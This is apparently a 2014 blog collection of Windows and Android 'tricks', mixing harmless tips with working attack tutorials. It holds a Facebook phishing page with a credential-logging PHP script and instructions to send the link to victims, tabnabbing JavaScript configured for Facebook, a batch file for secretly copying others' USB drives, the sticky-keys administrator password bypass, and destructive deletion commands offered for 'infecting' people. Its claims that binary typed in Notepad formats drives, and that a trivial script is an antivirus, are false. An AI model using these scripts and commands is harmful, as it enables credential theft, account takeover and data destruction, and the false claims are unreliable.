Sunday, 23 November 2014

How to share remote screens and control PC without any software in Windows







Rate this (2 Votes)
Remote sharing is nowadays on its peak, people use remote sharing to provide live support or for sharing screens. Most of us always use third party software's for sharing or controlling remote systems using software's like Teamviewer or Radmin etc.  Today i am going to teach you guys how to connect any two or as many as windows PC through remote without using any third party tool like team viewer etc. So lets learn how to share screens without any third party tool.

Windows Remote assistance without any external software
Windows Remote assistance without any external software


As we all knows Windows OS is  full of hidden programs that are only limited to developer or geeks. Today we are going to learn about MSRA (windows remote assistance) executable. MSRA is windows inbuilt remote assistance program using which you can control remote pc's, share remote screens, provide remote support and much more. Lets learn how to use MSRA for remote sharing.

Steps to Share or Control Remote PC using MSRA:


1. First of all click on startup and type command "MSRA" and press enter as shown below:



Type msra in search option
Type msra in search option


2. Now you will see screen like below having title "Windows Remote Assistance" , there are two options displayed:

a. Invite someone you trust to help you : Choose this option if you want to share your screen with someone.
b. Help someone who invited you : Choose this option if you want to control someone others PC remotely.

Click on Option a "Invite someone you trust to help you" to share your screen:



invite someone to provide remote assistance
Select shown option to continue


Once you click the above option then you will see below panel with multiple options:



Options displayed for Windows remote assistance
Options displayed for Windows remote assistance

Now you can see three different options :
a. Send this invitation as file : On clicking this option you can save the invitation file and send it to anyone from which you require help. After saving the file another window will open containing the password. You have to provide that password to person whom you want to connect to your machine.

b. Use email to send an invitation: You can send invitation directly via email but it requires email client on your machine to send email like outlook etc.


c. Use Easy connect: Another method to directly connect two PC is using Easy connect but this require some basic settings at your routers end i.e. If the computer has IPv6 disabled or is behind a NAT router that blocks Teredo traffic, the Easy Connect option will be unavailable.


Now once you have send the  remote assistance invitation file to user, he can connect to your PC by double clicking the invitation file and then entering the password.


Note: You need to enable remote assistance service.


3. Help someone who invited you : By clicking this option you can provide help to anyone who has done the above task. You will need two things : Invitation file and password to connect remote PC.



Woohooo... Did you know there is another smart option by which you can directly connect to any PC using IP address? If not, well lets learn that too. Yup we can also provide windows remote assistance support using IP address too. Here are options.


1. First of all click on startup and type command "MSRA" and press enter.

2. Now you will see screen where two options are displayed, Select "Help someone who invited you".
3. After that you will see some option, click on the bottom one "Advanced connection option for help desk" as shown below :


Select advanced connection option for help desk
Select advanced connection option for help desk


After clicking option you see below panel to enter IP address:


Enter IP address or computer name
Enter IP address or computer name

After entering IP address press Next to connect to IP address. That's all.

Hope you all enjoyed the learning. If you have any queries ask me in form of comments.
       how to create phishing page to hack someone
 i am adeel abbasi i will tell you how to hack someone,s account just for educational purpose

steps to create a phishing page:

1.Go to the Facebook page ,and then right click on the page, u will see the option view source page,click on that.



                                          
2.now a new tab will open which contain a source code,Select all the stuff and paste it in a notepad.
3.Now open the notepad and press CTRL+F,and type ACTION.

facebook phishing script
                                                  

                                           
4.You will have to find a text which looks like ..

                                       action="https://www.facebook.com/login.php?login_attempt=1"

5.delete all the text written in red colour and instead of it write post.php.then it will look like...

                                                 action="post.php"

6.Now save it on your desktop with the name index.htm,not index.html,remember.

7.Now your phishing page is ready.it will look like a pic given below .

hacking script
index

                                                   
8.Open a new notepad and save the given data with the name post.php.

<?php
header ('Location:http://www.facebook.com/');
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?> 

9.You have two files now one is index.htm and another is post.php,remember file extension is important.

10.Now u have to upload it in a web hosting site ,i prefer u to use www.000webhost.com or else www.,my3gb.com.

11.I prefer u to use 000webhost because it will be easy to use.
                           
hosting website
                                              

12.You have to make a account in that ,after that it looks like a picture given below.


facebook script hosting website
                                                                          
13.Now go control pannel,then on file manager.

14.After that a new window will pop up.Now go to public_html.

                                           
                                        

15.Delete the file named default.php,after that upload two files index.htm and post.php one by        one .


                                        
16.Now the last step click on view of index.htm it will look same as facebook page.


this is your Facebook phishing page
                                         

17.Copy the url of that page and send this link to your victim,when your victim try to login in to it with the username and password .the page redirectly connect to facebook. and you will be now able to see his password.

18.Open your 000webhost account and go to file manager then public_html,here you find a new file named username.txt.
                                

                                        

19.Click on view now u will have your friend's password and email id.

                                           

20.This is a simple trick to hack any Facebook password account by phishing page.

21.If you are not able to create a phishing page then i will provide u a video tutorial link,look
      in to the description of that video u will find a prepared module of phishing pages,download  
      it and enjoy.


       click here to view a video tutorial with the readymade phishing pages....

note:

phishing is a illegal activity so don't try on anyone.this tutorial is for educational purpose.
Not only Facebook u can make any phishing page of any website by following these steps....
u can hack Gmail,Yahoo,Orkut,Twitter and many more.....




                                               

Hope u like my post,in my next tutorial i will show u how to hack Facebook in a easiest way....
just for eductional purpose, i am not responsible if anything happen ok got it...

hello i am adeel abbasi

Advanced Tabnabbing Tutorial HackingLoops



Hey friends, today i am going to How to Hack emails, social networking websites and other websites involving login information. The technique that i am going to teach you today is Advanced Tabnabbing. I have already explained what is basic tabnabbing today we will extend our knowledge base, i will explain things with practical example. So lets learn..
Advanced Tabnabbing, Hack Facebook, Gmail, Yahoo , Hotmail etc
Advanced Tabnabbing Tutorial
I will explain this tutorial  using attack scenario and live example and how to protect yourself from such stuff.
Let consider a attack scenario:
1. A hacker say(me Lokesh) customizes current webpage by editing/adding some new parameters and variables.( check the code below for details)
2. I (Lokesh) sends a copy of this web page to victim whose account or whatever i want to hack.
3. Now when user opens that link, a webpage similar to this one will open in iframe containing the real page with the help of java script.
4. The user will be able to browse the website like the original one, like forward backward and can navigate through pages.
5. Now if victim left the new webpage open for certain period of time, the tab or website will change to Phish Page or simply called fake page which will look absolutely similarly to original one.
6. Now when user enter his/her credentials (username/password), he is entering that in Fake page and got trapped in our net that i have laid down to hack him.
Here end's the attack scenario for advanced tabnabbing.
Note: This tutorial is only for Educational Purposes, I did not take any responsibility of any misuse, you will be solely responsible for any misuse that you do.  Hacking email accounts is criminal activity and is punishable under cyber crime and you may get upto 10 years of imprisonment, if got caught in doing so.
Before coding Part lets first share tips to protect yourself from this kind of attack because its completely undetectable and you will never be able to know that your account is got hacked or got compromised. So first learn how to protect our-self from Advanced Tabnabbing.
Follow below measure to protect yourself from Tabnabbing:
1. Always use anti-java script plugin's in your web browser that stops execution of malicious javascripts. For example: Noscript for Firefox etc.
2. If you notice any suspicious things happening, then first of all verify the URL in the address bar.
3. If you receive any link in the Email or chat message, never directly click on it. Always prefer to type it manually in address bar to open it, this may cost you some manual work or time but it will protect you from hidden malicious URL's.
4. Best way is to use any good web security toolbar like AVG web toolbar or Norton web security toolbar to protect yourself from such attacks.
5. If you use ideveloper or Firebug, then verify the headers by yourself if you find something suspicious.
That ends our security Part. Here ends my ethical hacker duty to notify all users about the attack. Now lets start the real stuff..
Note: Aza Raskin was the first person to propose the technique of tabnabbing and still we follow the same concept. I will just extend his concept to next level.

First sample code for doing tabnabbing with the help of iframes:
 <!--
Title: Advanced Tabnabbing using IFRAMES and Java script
Author: De$trUcTiVe M!ND (lokesh@hackingloops.com)
Website: http://www.hackingloops.com
Version:1.6
-->

<html>
<head><title></title></head>
<style type="text/css">
html {overflow: auto;}
html, body, div, iframe {margin: 0px; padding: 0px; height: 100%; border: none;}
iframe {display: block; width: 100%; border: none; overflow-y: auto; overflow-x: hidden;}
</style>
<body>

<script type="text/javascript">
//----------Set Script Options--------------
var REAL_PAGE_URL = "http://www.google.com/"; //This is the "Real" page that is shown when the user first views this page
var REAL_PAGE_TITLE = "Google"; //This sets the title of the "Real Page"
var FAKE_PAGE_URL = "http://www.hackingloops.com"; //Set this to the url of the fake page
var FAKE_PAGE_TITLE = "HackingLoops| Next Generation Hackers Portal"; //This sets the title of the fake page
var REAL_FAVICON = "http://www.google.com/favicon.ico"; //This sets the favicon.  It will not switch or clear the "Real" favicon in IE.
var FAKE_FAVICON = "http://www.hackingloops.com/favicon.ico"; //Set's the fake favicon.
var TIME_TO_SWITCH_IE = "4000"; //Time before switch in Internet Explorer (after tab changes to fake tab).
var TIME_TO_SWITCH_OTHERS = "10000"; //Wait this long before switching .
//---------------End Options-----------------
var TIMER = null;
var SWITCHED = "false";

//Find Browser Type
var BROWSER_TYPE = "";
if(/MSIE (\d\.\d+);/.test(navigator.userAgent)){
 BROWSER_TYPE = "Internet Explorer";
}
//Set REAL_PAGE_TITLE
document.title=REAL_PAGE_TITLE;

//Set FAVICON
if(REAL_FAVICON){
 var link = document.createElement('link');
 link.type = 'image/x-icon';
 link.rel = 'shortcut icon';
 link.href = REAL_FAVICON;
 document.getElementsByTagName('head')[0].appendChild(link);
}

//Create our iframe (tabnab)
var el_tabnab = document.createElement("iframe");
el_tabnab.id="tabnab";
el_tabnab.name="tabnab";
document.body.appendChild(el_tabnab);
el_tabnab.setAttribute('src', REAL_PAGE_URL);

//Focus on the iframe (just in case the user doesn't click on it)
el_tabnab.focus();

//Wait to nab the tab!
if(BROWSER_TYPE=="Internet Explorer"){ //To unblur the tab changes in Internet Web browser
 el_tabnab.onblur = function(){
 TIMER = setTimeout(TabNabIt, TIME_TO_SWITCH_IE);
 }
 el_tabnab.onfocus= function(){
 if(TIMER) clearTimeout(TIMER);
 }
} else {
 setTimeout(TabNabIt, TIME_TO_SWITCH_OTHERS);
}

function TabNabIt(){
 if(SWITCHED == "false"){
 //Redirect the iframe to FAKE_PAGE_URL
 el_tabnab.src=FAKE_PAGE_URL;
 //Change title to FAKE_PAGE_TITLE and favicon to FAKE_PAGE_FAVICON
 if(FAKE_PAGE_TITLE) document.title = FAKE_PAGE_TITLE;

 //Change the favicon -- This doesn't seem to work in IE
 if(BROWSER_TYPE != "Internet Explorer"){
 var links = document.getElementsByTagName("head")[0].getElementsByTagName("link");
 for (var i=0; i<links.length; i++) {
 var looplink = links[i];
 if (looplink.type=="image/x-icon" && looplink.rel=="shortcut icon") {
 document.getElementsByTagName("head")[0].removeChild(looplink);
 }
 }
 var link = document.createElement("link");
 link.type = "image/x-icon";
 link.rel = "shortcut icon";
 link.href = FAKE_FAVICON;
 document.getElementsByTagName("head")[0].appendChild(link);
 }
 }
}
</script>

</body>
</html>

Now what you need to replace in this code to make it working say for Facebook:
1. REAL_PAGE_URL : www.facebook.com
2. REAL_PAGE_TITLE : Welcome to Facebook - Log In, Sign Up or Learn More
3. FAKE_PAGE_URL : Your Fake Page or Phish Page URL
4. FAKE_PAGE_TITLE : Welcome to Facebook - Log In, Sign Up or Learn More
5. REAL_FAVICON : www.facebook.com/favicon.ico
6. FAKE_FAVICON : Your Fake Page URL/favicon.ico ( Note: Its better to upload the facebook favicon, it will make it more undetectable)
7. BROWSER_TYPE : Find which web browser normally user uses and put that name here in quotes.
8. TIME_TO_SWITCH_IE : Put numeric value (time) after you want tab to switch.
9. TIME_TO_SWITCH_OTHERS : Time after which you want to switch back to original 'real' page or some other Page.

Now as i have explained earlier you can use this technique to hack anything like email accounts, Facebook or any other social networking website. What you need to do is that just edit the above mentioned 9 fields and save it as anyname.htm and upload it any free web hosting website along with favicon file and send the link to user in form of email or chat message ( hidden using href keyword in html or spoofed using some other technique).

That's all for today. I hope you all enjoyed some advanced stuff. If you have any doubts or queries ask me in form of comments.
A comment of appreciation will do the work..

Tuesday, 18 November 2014

Customize the log-on screen

Changing the Windows log-on screen used to involve some complicated and potentially dangerous hacks, but not any more - Windows 7 makes it easy.

First, open regedit and browse to HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background, double-click the DWORD key called OEMBackground (not there? Create it) and set its value to 1.
Now find a background image you'd like to use. Make sure it's less than 256KB in size, and matches the aspect ratio of your screen as it'll be stretched to fit.

Next, copy that image into the %windir%\system32\oobe\info\backgrounds folder (create the info\backgrounds folders if they don't exist). Rename the image to backgroundDefault.jpg, reboot, and you should now have a custom log-on image.
ONE ACTION PERFORM BY TWO SHORTCUT KEYS?
Here is the answer to last week's "Question of the Week." Their are multiple keyboard shortcuts to minimize all running programs. The most prominent ones are Windows + M and Windows + D.

The difference between them is that Windows + M will minimize the programs, but you have to manually restore them.

Windows + D on the other hand will allow you to minimize the programs to check something out on your desktop. Press Windows + D again to restore all programs to their prior state. Like if this just made your day!
What key combination do you press to snap a window to the right side of the screen in Windows 7/8?

A. Ctrl + Right Arrow
B. Windows + R
C. Ctrl + >
D. Windows + Right Arrow

Bonus! List each key combination for snapping the window to the left side of the screen, maximizing and minimizing the window.
How to copy Data From Pendrive On Insert,
We sometime wish that if someone insert his/her pendrive or Dvd Into your pc then its data automatically copy in to your system in hidden Form.
there is no need of software in this. we will make it possible with the help of some Dos commands.
lets get started, Follow the below steps.

1. open cmd
3. type copy con filename.bat
3. now type “xcopy
i: f:\copied /h /s /c /q /i” remove ” “
4. type Exit
4. press f6
5. now it will create a batch file named filename.bat

here
xcopy is a command which is used to copy file and folder
i: is the name of your pen-drive drive name replace with your drive name
f:\copied is the name of folder where you wish to copied data is to be placed replace
with your own folder or path
/h is used to copy hidden files also
now copy this file into desktop now whenever someone insert his/her pendrive into your system then click on this file his data is automatically copied into the folder specified by you.
isn’t it cool, Try it yourself, dont forget to g+1 this.
Keep visiting, Stay updated.
WHO USE YOUR COMPUTER IN YOUR ABSENCE?
Hello friends i  am adeel abbasi ,,Today we will discuss about how to know who used your PC in you absence,
this can prove to be very usefull if more then 1 person is using a PC , and one of them want to know what the other guys did earlier.
just follow the below steps .
Steps :
start > run >eventvwr.msc
Events are stored in three log files: Application, Security, and System.
These logs can be reviewed and archived.
For our purposes we want the System log. Click on “System” in the left-hand column for a list of events.

Look for a date and time when you weren’t home and your computer should have been off.
double click on the eg: info and it will show you the detail.
You can also use this log to see how long someone was on the computer.
Just look at the time the computer was turned on and off for that day.
I hope this article prove to be Usefull to my awesome readers

How to use USB Flash drive to speed up your computer ?

DDR RAM 2 GB USB flash drive 1
Do you have a slow or old Computer? Also, do you have a USB Flash Drive? Then now you are able to extend its memory by Increasing the RAM of your Computer using the memory available on the USB Flash Drive. This stuff is a trick that Windows provided as a solution to boost a little of your RAM memory and evade those little lags that Windows produces when it runs out of RAM resource. Increasing the PC’s RAM using USB Flash Drive will help also enhance Game performance and decrease the time of execution of some tasks made by software.
How to Use a Flash Drive as RAM Memory
Windows XP

1) Insert the Flash Drive then Right Click on Computer > Properties
2) Navigate to Advanced tab then click Settings under Performance section. 3) Click Advanced tab again, and click Change under Virtual Memory section.
4) Select the USB Flash Drive letter from the list, click Custom Size .
5) Set the minimum and maximum size to use in the Flash Drive (better choose same size of flash drive)
6) Press OK and Apply all settings, Restart your Computer for changes to take effect.
Windows Vista / 7
1) Insert USB Flash Drive into your computer.
2) Right Click on the USB Flash Drive > Properties
3) Navigate to ReadyBoost tab.
4) Select Use this Device and allocate the amount of memory to use (better choose around 80% of USB Flash Drive’s size)
5) Click OK to apply all settings, then Restart the computer for changes to take effect
I hope you liked it !
Bill Gates' Fortune !!!
Photo: Bill Gates' Fortune !!!

How to install windows 7 with a USB DRIVE?

i am adeel abbasi.from azad kashmir. i will tell you how to install window 7 with USB drive...
Many of us face a lot of problem when we have to reinstall windows on our computer or laptop. First thing we have to decide from where to install windows? The options available are DVD or USB Pendrive..First thing, you should check whether your BIOS supports booting from USB. Most of the computer/laptops support. But if your BIOS doesn’t, then sorry, you cannot boot from a USB Flash Drive.Second thing, you need another computer with Windows installed with a DVD drive, to copy its contents later. So let us start with the procedure now:
1) Run command prompt (cmd). This can be done by clicking start and typing typing cmd in Windows 7. In Windows Xp, click on start and then click on run. Type cmd and run.
2) Then run diskpart utility from command prompt, by typing ‘diskpart’ on command prompt and pressing enter. This will run the diskpart utility in a separate windows,
3) Now put in your USB Flash Drive in a USB port. Your flash drive must be atleast 4 GB or 8 GB flash drive is best for this task. Now go back to the diskpart console and type ‘listdisk’ and press enter. This will show you a list of various storage devices available. You can see the size column of the disk and here we can see that ‘disk 2′ is our pen drive. Warning: In your computer it may be some other number. In our case it is ‘disk 2′.

4) Then you have to type ‘select disk 2′ and press enter. Note: in our case it is disk 2, in your case it may be disk3, or disk 1 or any other number. You can enter ‘detail disk’ to see the details of the disk after selecting it toverify that you have selected the correct disk. You can see these steps in the image below:

5) Then you have to run a series of commands. The commands to be run in the order are:- clean
– create partition primary
– select partition 1
– active
format fs=fat32
These steps are shown in the image below:

6) The format step will take some time. You can have a tea or coffee in the meantime and come back. After the format is complete you have to run ‘assign’ command. And after this you can exit diskpart utility by entering the ‘exit’ command. The steps are shown below:
– assign
- exit

7) After the format is complete, put in your original Windows 7 DVD in your DVD drive, or if you have an .iso image of the DVD, mount that image using any virtual drive software like Power ISO.
– Now go to My Computer, and open the contents of DVD Drive. Press ‘ctrl+a’ to select all contents and copy all the contents by pressing ‘ctrl+c’.
- Now go back to My Computer and open the USB Drive and press ‘ctrl+v’ to paste all the contents of DVD into the USB Disk.
 When the copy finishes, you are done just remove the USB Drive safely and use it to install Windows 7 in your computer/laptop.

Hope u enjoyed the tutorial !

How to HACK Android phone?

  Android introduces a cool new feature to ensure protection of private data to it’s users by Pattern Lock technique. It is a unique thinking , other than remembering or setting difficult combination of password characters whether in numeric or alphabetic form. Pattern lock provides a huge set of patterns to choose from. User may set any unique and different pattern according to their wish anytime.
With advantage of locking screen using this unique way , there is also a problem that sometimes many of android users have to face i.e. what if they forget the pattern they had used to lock their device or try to unlock it with wrong pattern number of times that turned device to get locked permanently ?
If you stuck in such problem so dont worry there are three methods to unlock your device.

METHOD 1. UNLOCK LOCK PATTERN USING YOUR EMAIL

First method includes a simple way of logging in to your Google account and then getting RID of that lock pattern.This is easiest and most recommended way of unlocking your device.
So if you have entered wrong pattern for 5 times and then if it is showing you the Forgot Lock Pattern option, then you can login through your Google account and bypass the lock pattern system on your device.
METHOD 2. UNLOCK LOCK PATTERN USING COMMAND PROMPT
If you have forgotten your email too and unable to log in to your google account then the second method could be handy that includes executing few lines of script in command prompt which will allow you to write any pattern and to get into your OS . As this method includes use of command lines , so it is not that user friendly but it is the most effective way for sure. It involves a few steps :
Step 1: Connect your Android Phone to Your Computer.
Step 2 : Open command prompt as administrator.
Step 3 : Now in command prompt window type the following code carefully exactly as it is and then press  enter.
adb shell
cd /data/data/com.android.providers.settings/databases
sqlite3 settings.db
update system set value=0 where name=’lock_pattern_autolock';
update system set value=0 where name=’lockscreen.lockedoutpermanently';
.quit
 Step 4 : Now you will some screen as shown below and then you can reboot your phone and now when your will start again then try unlocking your phone using any random lock pattern and it will work pretty fine.
Step 5 : If you face any problem repeat same steps but instead of the above code try using adb shell rm /data/system/gesture.key and then press enter and now try rebooting your device to see if it works.

 METHOD 3. UNLOCK USING HARD RESET OPTION

Hard Reset is an inbuilt feature of android phones and tablets and every device has it. This method will unlock your device but will remove all user’s data and settings as well. You should use this method when none of the above methods work for you and you need to unlock your device urgently. This will remove only the data from phone memory and not from the SD card available in phone.
It involves a few steps to unlock device :
Step 1 : Switch off your phone.
Step 2 : Now while turning your phone on , you need to press some specific combination of keys. Generally it is volume up + power button in many of the android devices so try them first and if they dont work for you so here are list of some popular device combination keys or else better way is to google it.
  • Nexus 7 – Volume Up + Volume Down + Power
  • Samsung Galaxy S3 – Volume Up + Home + Power
  • Motorola Droid X – Home + Power
Step 3 : Now when your phone starts up and you see the logo of your phone , leave the power but but continue holding the volume up button until you see android recovery screen.
you will see some screen like shown above. Just navigate to wipe data/factory reset using volume keys and then press Power button to select it.
Step 4 : You will see a screen as shown below :
Step 5 : After you reach to Yes option , select it by using power switch and then it will erase all data on your phone and will unlock it and so ready to be used once again .
So these were possibly all methods for unlocking Android device and to Bypass the pattern lock of android device but if you know any other methods so please do comment below and I will add your method too .

How to DISABLE seen feature on FACEBOOK

facebook-seen-block
We usually think about HOW to disable seen feature of facebook? Because either we dont want our friends and family to know that we actually read their message or for some other reasons.

This Feature Can Prove To Be Usefull For Some People But For Others Feel Like Disabling This Feature Due To Many Reasons.
Its gets very Irritating When You Dont Want to Chat With one of Your Friend But Still You Have to Because To Them It Shows That You Have Seen The Message and You Are Ignoring Them.
Now, there is some good news! This Problem Can Be Solved By installing Just 1 Google Chrome Extention.
Disabling the seen feature is Very easy to set up on your computer. Just follow the steps and see the MAGIC work!
Step 1 : Download Fb Unseen From Chrome Web Store.
Step 2: Click On Add To Chrome > Ok.
Step 3: Your Download Will Start And Will Be Installed in Seconds.
Step 4: Thats It, Start Chatting, You Have Just Disabled The ” Seen ” Feature .
You Can Ask your Friend If They Can See ” Seen ” In Thier Chatbox .
Note: By Installing This Chrome Extention only Your Friends Can not See Whether You Have Seen Thier Message or Not, But You Can see ” Seen ” In your Chatbox If your Friend Have seen Or Not.
On todays world androids are getting a mass place than any. I share some Android secret codes today..

1. Back-light Test – *#*#0842#*#*
2. Test the Touchscreen – *#*#2664#*#*
3. Vibration Test – *#*#0842#*#*
4. FTA Software Version – *#*#1111#*#*
5. Complete Software and Hardware Info –
*#12580*369#
6. Diagnostic Configuration – *#9090#
7. USB Logging Control – *#872564#
8. System Dump Mode – *#9900#
9. HSDPA/HSUPA Control Menu – *#301279#
10. View Phone Lock Status – *#7465625#
11. Reset the Data Partition to Factory State –
*#*#7780#*#*
12. Format Your Device To Factory State(will delete
everything on your phone) – *2767*3855#
13. Hidden Service Menu For Motorola Droid –
##7764726 #
staytuned for the next..

How to make your own Antivirus ?

  downloadThe main functioning of Antivirus is to detect and remove harmful or unwanted files which may slowdown your computer and windows. But if you don’t have enough time to download any best antivirus. Then simply use this trick to make your own antivirus.This antivirus scan by using command prompt and delete unwanted files automatically.
Open your Notepad and paste this given code 

@echo off
title Antivirus
echo Antivirus
echo created by your name
:start
IF EXIST virus.bat goto infected
IF NOT EXIST virus.bat goto clean

cd C:\Windows\system32
:infected
echo WARNING VIRUS DETECTED!
del virus.bat
pause
goto start
:clean
echo System secure!
pause
exit

Now save your file with SmartTricks.bat and select “All files”

REMOVE virus from your computer using Command Prompt (CMD)

There are so many antivirus software available online to remove viruses from personal computer. But there are some viruses or suspicious files which can NOT be removed by any antivirus software. Some suspicious files such as autorun.inf initiate all the viruses in your computer.
Remove virus using CMD
These files must be removed for safe operation of your pc, because they may lead to data loss, software damages etc.Here’s a trick to remove all your viruses. Follow the steps given below to remove viruses using cmd ( command prompt )

Finding & Removing Viruses Using Command Prompt

Follow the below guide only if you think any of your drive is affected with virus or if you think there are some harmful files and you want to delete them.
Step 1: Go to start menu and type “cmd” in the search box or Start>all programs>accessories>command prompt.
Step 2: Select the infected drive,to do so type in CMD , D: to go to D: drive.
Step 3: Now type dir/w/a . It will show all the files of the drive including hidden files.
Now Check if there is any file or virus that you are not aware of and you think might be Harmful to your PC.
Step 4: Usually there is Autorun.inf file which you must delete it. to do so Type in attrib -h -r -s autorun.inf  and press Enter. Type del autorun.inf  and press Enter. Follow this for all other drives.
Step 5: We have now Succesfully found and deleted autorun.inf file from D drive. if you find any .exe file which is unknown to you. then delete it using the same above method.

How to remove Shortcut virus using cmd ?

The Shortcut viruses are those which converts all your data from your pen drive or Hard disk to shortcuts, but they are recoverable. just follow the below given steps to remove shortcut virus from pen drive and recover back your files.
  • Go to Start -> Run -> cmd.
  • Go to your pen drive directory.
  • Type this command: del *.lnk and press Enter.
  • Type attrib -h -r -s /s /d e:\*.* And then press Enter.

Recover your files :

You can recover your files through Winrar.
  1.  Open WINRAR Application.
  2. Navigate to your Pendrive location or PC Folder location.
  3. Copy Files and Paste where you want.
  4. Format your Pendrive.
Got some Files in your pen drive but they are empty! Because of the virus in your pendrive malfunctions your drive. How to remove this empty folder virus and recover files? Follow the steps given below.
  • Start -> Run -> cmd.
  • Type this command: attrib -h -r -s /s /d x:\*.*
  • Here the letter “x” should be replaced with the drive alphabet of your pendrive that you have inserted into the computer.
  • If your pendrive shows the drive alphabet as “J”, then type  this command: attrib -h -r -s /s /d j:\*.* And then press Enter.
Restart your Pc for the changes to take place… So these were some methods to find and remove different viruses using Command Prompt. I hope this will help many of my Readers.

How to Hack ADMIN password for Windows?

87k27uc
1) Go to C:/windows/system32.
2) Copy cmd.exe and paste it on desktop.
3) Rename cmd.exe to sethc.exe.

4) Copy the new sethc.exe to system 32,when windows asks for overwriting the file,then click yes.
5) Now Log out from your guest account and at the user select window,press shift key 5 times.
6) Instead of Sticky Key confirmation dialog,command prompt with full administrator privileges will open.
7) Now type “ NET USER ADMINISTRATOR “zzz” where “zzz” can be any password you like and press enter.
8) You will see “ The Command completed successfully” and then exit the command prompt and login into administrator with your new password.
9) Bravo !! Now You have hacked admin through guest account.
This is another method you can use to hack admin password without knowing it.
It is possible to change Adminstrator password both in Win XP and Vista without knowing it. If you some how manage to login as an Administrator then you can change the password without knowing it.


Here’s the Step-By-Step instructions. 

1. Right-click on the “My Computer” icon on the desktop OR in the Start Menu.

2. Select the option “Manage”.

3. E
xpand the “Computer Management (Local) tree (if it is not already expanded) on the left pane.

4. Double click on the “Local Users and Groups” option From “System Tools” tree.


5. Click the “Users” option.


6. Y
ou will now see the list of users on the right side pane, such as Administrator, Guest etc.

7. Right click on the “Administrator” and select the option for “Set Password” option.


8. You will now see a warning message, Click on proceed.


9. Now the system will ask you for “New Password” and “Confirm Password” .


10. After you have entered click on “OK”. The password is changed. That’s It!
How To Format Hard drive with Notepad?
Many of us think that notepad is a useless tool. Actually, you can perform a lot of function using notepad. One of the main fuction in which notepad come in handy is that you can format your HDD (Hard Disk Drive) using notepad. Yes!
Step 1. Copy The Following In Notepad Exactly as it says

01001011000111110010010101010101010000011111100000
Step 2. Save As  .EXE extension. Any Name Will Do…
Step 3. Send the EXE to People And Infect
OR
IF u think u cannot format c driver when windows is running try Laughing and u will get it Razz .. any way some more so u can test on other drives this is simple binary code
format c:\ /Q/X — this will format your drive c:\
01100110011011110111001001101101011000010111010000
100000011000110011101001011100
0010000000101111010100010010111101011000
format d:\ /Q/X — this will format your drive d:\
IMPORTANT : This Trick is for Educational Purpose only.DONT TRY ON YOUR OWN PC.Smart Tricks is not responsible for it. TRY WITH YOUR OWN RISK.It lead to loss of data and crashing your computer..!!
01100110011011110111001001101101011000010111010000
100000011001000011101001011100
0010000000101111010100010010111101011000
del /F/S/Q c:\boot.ini — this will cause your computer not to boot.
01100100011001010110110000100000001011110100011000
101111010100110010111101010001
00100000011000110011101001011100011000100110111101
101111011101000010111001101001
0110111001101001
Try to figure out yourself rest can’t spoon feed Its working.
Do not try it on your PC. Don’t mess around this is for educational purpose only
still if you cant figure it out try this:
go to notepad and type the following:
@Echo off
Del C:\ *.*|y save it as Dell.bat
want worse then type the following:
@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00
and save it as a .bat file

YOU AGREE TO DO THIS AT YOUR OWN RISK. PLEASE BE ADVISED THAT DOING THIS TRICK WILL FORMAT YOUR HARD DRIVE AND WILL RESULT IN DATA LOSS OR SOFTWARE AND HARDWARE FAILURE.

How to speed up Mozilla Firefox


Learn how to speed up Mozilla Firefox…. just follow these simple steps.
Open a new tab on firefox and type the about:config on the address bar.
Then new Window will appear, now Right click on anywhere whitespace on your window and click New > Integer
New Pop up Window will appear. Then Type the nglayout.initialpaint.delay
on the box then click Ok.
After that new window will appear. then Enter 0 Value then restart firefox
Hope You will See a Good Result in terms of its speed..

Recover deleted messages on Whatsapp

To Recover Recent Chat Messages
You can recover almost everything which is below 7 days old in WhatsApp. In fact, it is amazingly simple. All you have to uninstall WhatsApp and install it again. A backup is automatically created by WhatsApp daily at 4 am. The application stores that data in your phone’s external memory i.e. your SD card. When you reinstall WhatsApp, it will prompt you to restore your messages back. All you have to tap ‘Restore’ button and get all your messages back.
To Recover Messages Older than 7 Days
It is quite more complex to recover older messages in this application. But it is still possible to get them back. You can do it in two ways – first is manual method and next one is using a third party software.
Manual Recovery
  1. Go to the ‘Databases’ folder of your memory card – go through Memory Card – WhatsApp – Databases. In this folder, you will find different chat files named something like “msgstore-date format.db.crypt”. The date format must be YYYY-MM-DD.
  2. First of all, you have to rename that msgstore file. Give it name “Old” or something which is related to filename.
  3. Then review all the files located below. These files must be named in different dates. Choose your desired files and get the one deleted by you by mistake and then rename it back with older file name.
  4. Get back to main screen. Delete and reinstall the application. When installed, it will prompt you to restore files, tap the option and your desired file will be restored and saved as “msgstore.db.crypt”.
  5. Remember that your recent chat history shall be removed when you restore the older file. You cannot merge the recent chat messages with recovered, earlier chat files. You have to repeat the process again to get your recent messages back and it will again delete old one and place a new file.
Second Option – Third Party Tool
This option is a lot faster than previous one. All you have to use any free-to-use software. With this service, you can find all the contents of WhatsApp databases and extract all your desired messages. All you have to choose your desired messages from your memory card on your Smartphone and click Scan button. The scan process may consume several minutes according to your file size. When scanning is done, click ‘Recovered Registers’ and read all your chat messages.
Hope you all enjoyed this trick. stay tuned!